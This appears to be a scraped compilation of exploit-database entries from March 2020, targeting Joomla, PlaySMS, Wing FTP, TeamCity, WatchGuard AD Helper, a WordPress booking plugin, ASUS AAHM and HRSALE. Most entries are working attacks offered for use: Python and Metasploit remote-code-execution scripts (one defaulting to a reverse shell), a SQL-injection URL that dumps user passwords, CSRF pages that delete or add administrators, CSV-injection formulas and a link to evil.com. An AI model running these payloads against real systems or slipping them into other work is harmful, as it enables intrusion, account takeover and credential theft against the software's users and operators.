ISHACK AI BOT

#!/usr/bin/python3 # Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection # Date: 2020-03-10 # Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity) # Exploit Author: Abdullah - @i4bdullah # Vendor Homepage: https://www.joomla.org/ # Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip # Version: 3.9.0 < 3.9.7 # Tested on: Ubuntu 18.04 LTS and Windows 7 # CVE : CVE-2019-12765 import mechanize import sys if (len(sys.argv) != 2): print(f'Usage: {sys.argv[0]} <Base URL>') print(f'Example: {sys.argv[0]} http://127.0.0.1 ') sys.exit(1) base_url = sys.argv[1] reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101" login_url = f"{base_url}/joomla/index.php?option=com_users" def pwn(username='abdullah'): payload = "=cmd|'/c calc.exe'!A1" print(f"Registering a new user with the name <{payload}>...") reg_form = mechanize.Browser() reg_form.set_handle_robots(False) reg_form.open(reg_url) reg_form.select_form(nr=0) reg_form.form['jform[name]'] = payload reg_form.form['jform[username]'] = username reg_form.form['jform[password1]'] = 'password' reg_form.form['jform[password2]'] = 'password' reg_form.form['jform[email1]'] = '[email protected]' reg_form.form['jform[email2]'] = '[email protected]' reg_form.submit() print("The exploit ran successfully.") print("Exiting...") sys.exit(0) pwn()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code Execution', 'Description' => %q{ This module exploits a Preauth Server-Side Template Injection leads remote code execution vulnerability in PlaySMS Before Version 1.4.3. This issue is caused by Double processes a server-side template by Custom PHP Template system called 'TPL'. which is used in PlaySMS template engine location src/Playsms/Tpl.php:_compile(). When Attacker supply username with a malicious payload and submit. This malicious payload first process by TPL and save the value in the current template after this value goes for the second process which result in code execution. The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection. This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine. }, 'Author' => [ 'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module 'Lucas Rosevear' # Found and Initial PoC by NCC Groupd ], 'License' => MSF_LICENSE, 'References' => [ ['CVE','2020-8644'], ['URL',' https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ '] ], 'DefaultOptions' => { 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_python' }, 'Privileged' => false, 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'python' } }, 'Targets' => [ [ 'PlaySMS Before 1.4.3', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 05 2020')) register_options( [ OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']), ]) end def uri return target_uri.path end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php') }) rescue vprint_error('Unable to access the index.php file') return CheckCode::Unknown end if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') return Exploit::CheckCode::Appears end return CheckCode::Safe end #Send Payload in Login Request def login res = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'method' => 'GET', 'vars_get' => { 'app' => 'main', 'inc' => 'core_auth', 'route' => 'login', } }) # Grabbing CSRF token from body /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? vprint_good("X-CSRF-Token for login : #{csrf}") cookies = res.get_cookies vprint_status('Trying to Send Payload in Username Field ......') #Encoded in base64 to avoid HTML TAGS which is filter by Application. evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}" # Send Payload with cookies. res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php'), 'cookie' => cookies, 'vars_get' => Hash[{ 'app' => 'main', 'inc' => 'core_auth', 'route' => 'login', 'op' => 'login', }.to_a.shuffle], 'vars_post' => Hash[{ 'X-CSRF-Token' => csrf, 'username' => evil, 'password' => '' }.to_a.shuffle], }) fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? # Request Status Check if res.code == 302 print_good("Payload successfully Sent") return cookies else fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes Wrong") end end def exploit cookies = login vprint_status("Cookies here : #{cookies}") # Execute Last Sent Username. res = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'method' => 'GET', 'cookie' => cookies, 'vars_get' => { 'app' => 'main', 'inc' => 'core_auth', 'route' => 'login', } }) end end -- Touhid Shaikh Exploit Researcher and Developer | Security Consultant m: +91 7738794435 e: [email protected] www.touhidshaikh.com [image: Facebook icon] <https://www.facebook.com/tauheeds1> [image: LinkedIn icon] <https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon] <https://twitter.com/touhidshaikh22> [image: Youtube icon] <https://www.youtube.com/touhidshaikh22> The content of this email is confidential and intended for the recipient specified in message only. It is strictly forbidden to share any part of this message with any third party, without a written consent of the sender. If you received this message by mistake, please reply to this message and follow with its deletion, so that we can ensure such a mistake does not occur in the future.

# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation # Date: 2020-03-10 # Exploit Author: Dhiraj Mishra # Vendor Homepage: https://www.wftpserver.com # Version: v6.2.6 # Tested on: Windows 10 *Summary:* An authenticated CSRF exists in web client and web administration of Wing FTP v6.2.6, a crafted HTML page could delete admin user from the application where as administration needs to re-install the program and add admin user again. Issue was patched in v6.2.7. *Proof of concept:* <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://IP:5466/admin_delete_admin.html" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="r" value="0&#46;9219583354400562" /> <input type="submit" value="Submit request" /> </form> </body> </html> *Patch (lua/cgiadmin.lua):* URL: https://www.wftpserver.com/serverhistory.htm local outfunc = "echo" local function out (s, i, f) s = string.sub(s, i, f or -1) if s == "" then return s end s = string.gsub(s, "([\\\n\'])", "\\%1") s = string.gsub(s, "\r", "\\r") return string.format(" %s('%s'); ", outfunc, s) end local function translate (s) s = string.gsub(s, "<%%(.-)%%>", "<??lua %1 ??>") local res = {} local start = 1 while true do local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[ \t]*(=?)(.-)%?%?>", start) if not ip then break end table.insert(res, out(s, start, ip-1)) if target ~= "" and target ~= "lua" then table.insert(res, out(s, ip, fp)) else if exp == "=" then table.insert(res, string.format(" %s(%s);", outfunc, code)) else table.insert(res, string.format(" %s ", code)) end end start = fp + 1 end table.insert(res, out(s, start)) return table.concat(res) end local function compile (src, chunkname) return loadstring(translate(src),chunkname) end function include (filename, env) if incfiles[filename] == nil then incfiles[filename] = true; path = c_GetAppPath() path = path .. "/webadmin/"..filename local errstr = string.format("<b>The page '%s' does not exist!</b>",filename) local fh,_ = io.open (path) if not fh then echo_out = echo_out..errstr return end local src = fh:read("*a") fh:close() local prog = compile(src, path) local _env if env then _env = getfenv (prog) setfenv (prog, env) end local status,err = pcall(prog) if not status then if type(err) == "string" and not string.find(err,"exit function!") then print(string.format("some error in %s!",err)) end return end end end function var_dump(var) print("{") if type(var) == "string" or type(var) == "number" or type(var) == "boolean" or type(var) == "function" then print(var) elseif(type(var) == "thread") then print("thread") elseif(type(var) == "userdata") then print("userdata") elseif type(var) == "nil" then print("nil") elseif type(var) == "table" then for k,v in pairs(var) do if type(k) == "string" then k="'"..k.."'" end if(type(v) == "string") then print(k.."=>'"..v.."',") elseif(type(v) == "number" or type(v) == "boolean") then print(k.."=>"..tostring(v)..",") elseif(type(v) == "function") then print(k.."=>function,") elseif(type(v) == "thread") then print(k.."=>thread,") elseif(type(v) == "userdata") then print(k.."=>userdata,") elseif(type(v) == "nil") then print(k.."=>nil,") elseif(type(v) == "table") then print(k.."=>table,") else print(k.."=>object,") end end else print("object") end print("}") end function init_get() local MatchedReferer = true if _SESSION_ID ~= nil then local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") if Referer ~= nil and Referer ~= "" then local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") if Host ~= nil and Host ~= "" then if string.sub(Referer,8,string.len(Host)+7) == Host or string.sub(Referer,9,string.len(Host)+8) == Host then MatchedReferer = true else MatchedReferer = false exit() end end else MatchedReferer = false end end string.gsub (urlparam, "([^&=]+)=([^&=]*)&?", function (key, val) if key == "domain" then if MatchedReferer == true then rawset(_GET,key,val) else rawset(_GET,key,specialhtml_encode(val)) end else if MatchedReferer == true then rawset(_GET,unescape(key),unescape(val)) else --rawset(_GET,unescape(key),specialhtml_encode(unescape(val))) end end end ) end function init_post() local MatchedReferer = true if _SESSION_ID ~= nil then local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") if Referer ~= nil and Referer ~= "" then local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") if Host ~= nil and Host ~= "" then if string.sub(Referer,8,string.len(Host)+7) == Host or string.sub(Referer,9,string.len(Host)+8) == Host then MatchedReferer = true else MatchedReferer = false exit() end end else MatchedReferer = false end end if string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=") then string.gsub (strContent, "[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n", function (key, val) if key == "domain" then if MatchedReferer == true then rawset(_POST,key,val) else rawset(_POST,key,specialhtml_encode(val)) end else if MatchedReferer == true then rawset(_POST,unescape(key),unescape(val)) else --rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) end end end ) else string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?", function (key, val) if key == "domain" then if MatchedReferer == true then rawset(_POST,key,val) else rawset(_POST,key,specialhtml_encode(val)) end else if MatchedReferer == true then rawset(_POST,unescape(key),unescape(val)) else --rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) end end end ) end end function init_session() if _COOKIE["UIDADMIN"] ~= nil then _SESSION_ID = _COOKIE["UIDADMIN"] SessionModule.load(_SESSION_ID) end end function init_cookie() local cookiestr = string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)") if cookiestr == nil or cookiestr == "" then return end string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?", function (key, val) rawset(_COOKIE,unescape(key),unescape(val)) end ) end function setcookie(name,value,expire_secs) if name == "UIDADMIN" then return end local expiretime = os.date("!%A, %d-%b-%Y %H:%M:%S GMT", os.time()+3600*24*365) _SETCOOKIE = _SETCOOKIE.."Set-Cookie: "..name.."="..value.."; expires="..expiretime.."\r\n" rawset(_COOKIE,name,value) end function getcookie(name) if name == "UIDADMIN" then return end return _COOKIE[name] end function deletecookie(name) setcookie(name,"",-10000000) end function deleteallcookies() for name,_ in pairs(_COOKIE) do deletecookie(name) end end local cookie_metatable = { __newindex = function(t,k,v) setcookie(k,v,360000) end } setmetatable(_COOKIE,cookie_metatable) session_metatable = { __newindex = function(t,k,v) if type(v) ~= "table" then if k ~= nil then k = string.gsub(k,"'","") k = string.gsub(k,"\"","") end if v ~= nil then --v = string.gsub(v,"%[","") --v = string.gsub(v,"%]","") end rawset(_SESSION,k,v) SessionModule.save(_SESSION_ID) end end } --setmetatable(_SESSION,session_metatable) function init_all() init_cookie() init_session() init_get() init_post() end function setContentType(typestr) _CONTENTTYPE = typestr end function exit() error("exit function!") end

# Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution # Date: 2020-03-20 # Exploit Author: Dylan Pindur # Vendor Homepage: https://www.jetbrains.com/teamcity/ # Version: TeamCity < 10.0 (42002) # Tested on: Windows 10 (x64) # References: # https://www.exploit-db.com/exploits/45917 # https://www.tenable.com/plugins/nessus/94675 # # TeamCity Agents configured to use bidirectional communication allow the execution # of commands sent to them via an XML-RPC endpoint. # # This script requires the following python modules are installed # pip install requests # #!/usr/local/bin/python3 import requests import sys # region tc7 teamcity_7_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myCheckoutType>ON_AGENT</myCheckoutType> <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory> <myServerParameters class="tree-map"> <no-comparator/> <entry> <string>system.build.number</string> <string>0</string> </entry> </myServerParameters> <myVcsRootOldRevisions class="tree-map"> <no-comparator/> </myVcsRootOldRevisions> <myVcsRootCurrentRevisions class="tree-map"> <no-comparator/> </myVcsRootCurrentRevisions> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootEntries/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myRunnerParameters class="tree-map"> <no-comparator/> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> <myServerParameters class="tree-map"> <no-comparator/> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myBuildFeatures/> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip() # endregion # region tc8 teamcity_8_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myCheckoutType>ON_AGENT</myCheckoutType> <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory> <myServerParameters class="tree-map"> <entry> <string>system.build.number</string> <string>0</string> </entry> </myServerParameters> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootCurrentRevisions class="tree-map"/> <myVcsRootEntries/> <myVcsRootOldRevisions class="tree-map"/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myId>x</myId> <myIsDisabled>false</myIsDisabled> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myChildren class="list"/> <myServerParameters class="tree-map"> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> <myRunnerParameters class="tree-map"> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myBuildFeatures/> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip() # endregion # region tc9 teamcity_9_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myBuildTypeExternalId>x</myBuildTypeExternalId> <myCheckoutType>ON_AGENT</myCheckoutType> <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myServerParameters class="StringTreeMap"> <k>system.build.number</k> <v>0</v> </myServerParameters> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildFeatures/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootCurrentRevisions class="tree-map"/> <myVcsRootEntries/> <myVcsRootOldRevisions class="tree-map"/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myId>x</myId> <myIsDisabled>false</myIsDisabled> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myChildren class="list"/> <myServerParameters class="tree-map"> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> <myRunnerParameters class="tree-map"> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip() # endregion # region tc10 teamcity_10_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myBuildTypeExternalId>x</myBuildTypeExternalId> <myCheckoutType>ON_AGENT</myCheckoutType> <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout> <myVcsSettingsHashForAgentCheckout>123456</myVcsSettingsHashForAgentCheckout> <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myServerParameters class="StringTreeMap"> <k>system.build.number</k> <v>0</v> </myServerParameters> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildFeatures/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myParametersSpecs class="StringTreeMap"/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootCurrentRevisions class="tree-map"/> <myVcsRootEntries/> <myVcsRootOldRevisions class="tree-map"/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myId>x</myId> <myIsDisabled>false</myIsDisabled> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myChildren class="list"/> <myServerParameters class="tree-map"> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> <myRunnerParameters class="tree-map"> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip() # endregion def prepare_payload(version, cmd): if version == 7: return teamcity_7_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 8: return teamcity_8_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 9: return teamcity_9_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 10: return teamcity_10_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) else: raise Exception("No payload available for version {}".format(version)) def send_req(host, port, payload): headers = { "Content-Type": "text/xml" } url = "http://{}:{}/".format(host, port) r = requests.post(url, headers=headers, data=payload) if r.status_code == 200 and 'fault' not in r.text: print('Command sent successfully') else: print('Command failed') print(r.text) if len(sys.argv) != 4: print('[!] Missing arguments') print('[ ] Usage: {} <target> <port> <cmd>'.format(sys.argv[0])) print("[ ] E.g. {} 192.168.1.128 9090 'whoami > C:\\x.txt'".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) cmd = sys.argv[3] version = input("Enter TeamCity version (7,8,9,10): ") version = int(version.strip()) if version not in [7, 8, 9, 10]: print("Please select a valid version (7,8,9,10)") sys.exit(1) payload = prepare_payload(version, cmd) send_req(target, str(port), payload)

# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure # Author: RedTeam Pentesting GmbH # Date: 2020-03-11 # Vendor: https://www.watchguard.com # Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html # CVE: N/A Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component RedTeam Pentesting discovered a credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext. Details ======= Product: WatchGuard Fireware AD Helper Component Affected Versions: 5.8.5.10233, < 5.8.5.10317 Fixed Versions: 5.8.5.10317 Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ "Threat Detection and Response (TDR) is a cloud-based subscription service that integrates with your Firebox to minimize the consequences of data breaches and penetrations through early detection and automated remediation of security threats." "Threat Detection and Response includes the AD Helper component. If your network has an Active Directory server, you can install AD Helper to manage automated installation and updates of Host Sensors on your network." (from the vendor's homepage) More Details ============ By accessing the AD Helper's web interface, it was discovered that a call to an API endpoint is made, which responds with plaintext credentials to all configured domain controllers. There is no authentication needed to use the described interface and the installation instructions at [1] contain no indication of any way to configure access control. Proof of Concept ================ An HTTP GET request to the path "/domains/list" of the AD Helper API returns, among others, the plaintext credentials to all configured Windows domain controllers: ------------------------------------------------------------------------ $ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq . { "content": [ { "id": 1, "fullyQualifiedName": "example.com", "logonDomain": "example.com", "domainControllers": "dc1.example.com", "username": "[DOMAIN_USER]", "password": "[DOMAIN_PASSWORD]", "uuid": "[...]", "servers": [ { [...] } ] } ], "totalPages": 1, "totalElements": 1, "number": 0, "numberOfElements": 1 } ------------------------------------------------------------------------ The same request and its response can be observed when initially accessing the web interface. The discovered version of AD Helper responds with the following server banner: ------------------------------------------------------------------------ jetty(winstone-5.8.5.10233-9.4.12.v20180830) ------------------------------------------------------------------------ It is likely that other versions of the AD Helper Component are vulnerable as well. Workaround ========== Ensure API of the AD Helper Component is not reachable over the network, for example by putting it behind a Firewall. Fix === Update to Version 5.8.5.10317 or later. Security Risk ============= No authentication is needed to access AD Helper's web interface and the installation instructions at [1] describe that configured domain user accounts must possess at least the following privileges: * Connect to the host * Mount the share ADMIN$ * Create a file on the host * Execute commands on the host * Install software on the host Access to the "ADMIN$" share implies a user with administrative privileges. Therefore, this vulnerability poses a high risk. Timeline ======== 2020-02-12 Vulnerability identified 2020-02-19 Customer approved disclosure to vendor 2020-02-24 Tried to contact the German branch of WatchGuard 2020-02-27 Contacted the Dutch branch of WatchGuard 2020-02-28 Contact to ADHelper QA Team Lead established 2020-03-02 Advisory draft sent for verification 2020-03-10 Vendor released fixed version and blog post 2020-03-11 CVE ID requested 2020-03-11 Advisory released References ========== [1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection # Date: 2020-03-10 # Author: Milad Karimi # Software Link: # Version: # Category : webapps # Tested on: windows 10 , firefox # CVE : CWE-89 # Dork: inurl:index.php?option=com_newsfeeds index.php?option=com_newsfeeds&view=categories&feedid=[sqli] Example: http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--

# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection # Google Dork: N/A # Date: 2020-03-05 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.codepeople.net/ # Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip # Version: 1.3.34 # Tested on: Windows 7 x86 SP1 # CVE : CVE-2020-9371, CVE-2020-9372 ----Stored Cross-Site-Scripting------------------- 1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php 2) Calendar Name=<script>alert(0)</script> and Update 3) Click in any of the other tabs ----CSV injection--------------------------------- 1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out) 2) Then we go to the page and introduce data, and the payload: New booking: Name: IMPORTANT DATA Description: http://evil.com/evil.php New booking: Name: test Description: =HYPERLINK(K2;H2) This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel 3) Then we go to Bookings List and export the CSV file 4) After that we open the file, and import data from an external file, using comma as separator 5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example) Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016

# Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-03-11 # Vendor Homepage: https://www.asus.com/ # Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755 # Tested Version: 1.00.22 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """ ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe Auto C:\>sc qc asHmComSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: asHmComSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ASUS HM Com Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin) # Date: 2020-03-11 # Exploit Author: Ismail Akıcı # Vendor Homepage: http://hrsale.com/ # Software Link : http://demo.hrsale.com/ # Software : HRSALE v1.1.8 # Product Version: v1.1.8 # Vulnerability Type : Cross-Site Request Forgery (Add Admin) # Vulnerability : Cross-Site Request Forgery # Description : # CSRF vulnerability was discovered in v1.1.8 version of HRSALE. # With this vulnerability, authorized users can be added to the system. HTML CSRF PoC : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data"> <input type="hidden" name="&#95;user" value="1" /> <input type="hidden" name="csrf&#95;hrsale" value="e8ed76f1f2110f7244b58062e2209961" /> <input type="hidden" name="first&#95;name" value="Ismail" /> <input type="hidden" name="last&#95;name" value="Akici" /> <input type="hidden" name="company&#95;id" value="1" /> <input type="hidden" name="location&#95;id" value="1" /> <input type="hidden" name="username" value="ismailtakici" /> <input type="hidden" name="email" value="ismail&#46;akici&#64;gmail&#46;com" /> <input type="hidden" name="date&#95;of&#95;birth" value="2020&#45;03&#45;11" /> <input type="hidden" name="contact&#95;no" value="5554443322" /> <input type="hidden" name="employee&#95;id" value="1" /> <input type="hidden" name="date&#95;of&#95;joining" value="2020&#45;03&#45;11" /> <input type="hidden" name="department&#95;id" value="1" /> <input type="hidden" name="subdepartment&#95;id" value="YES" /> <input type="hidden" name="designation&#95;id" value="9" /> <input type="hidden" name="gender" value="Male" /> <input type="hidden" name="office&#95;shift&#95;id" value="1" /> <input type="hidden" name="password" value="Test1234&#33;" /> <input type="hidden" name="confirm&#95;password" value="Test1234&#33;" /> <input type="hidden" name="role" value="1" /> <input type="hidden" name="leave&#95;categories&#91;&#93;" value="0" /> <input type="hidden" name="leave&#95;categories&#91;&#93;" value="1" /> <input type="hidden" name="address" value="Test&#32;Address" /> <input type="hidden" name="is&#95;ajax" value="1" /> <input type="hidden" name="add&#95;type" value="employee" /> <input type="hidden" name="form" value="add&#95;employee" /> <input type="submit" value="Submit request" /> </form> </body> </html>

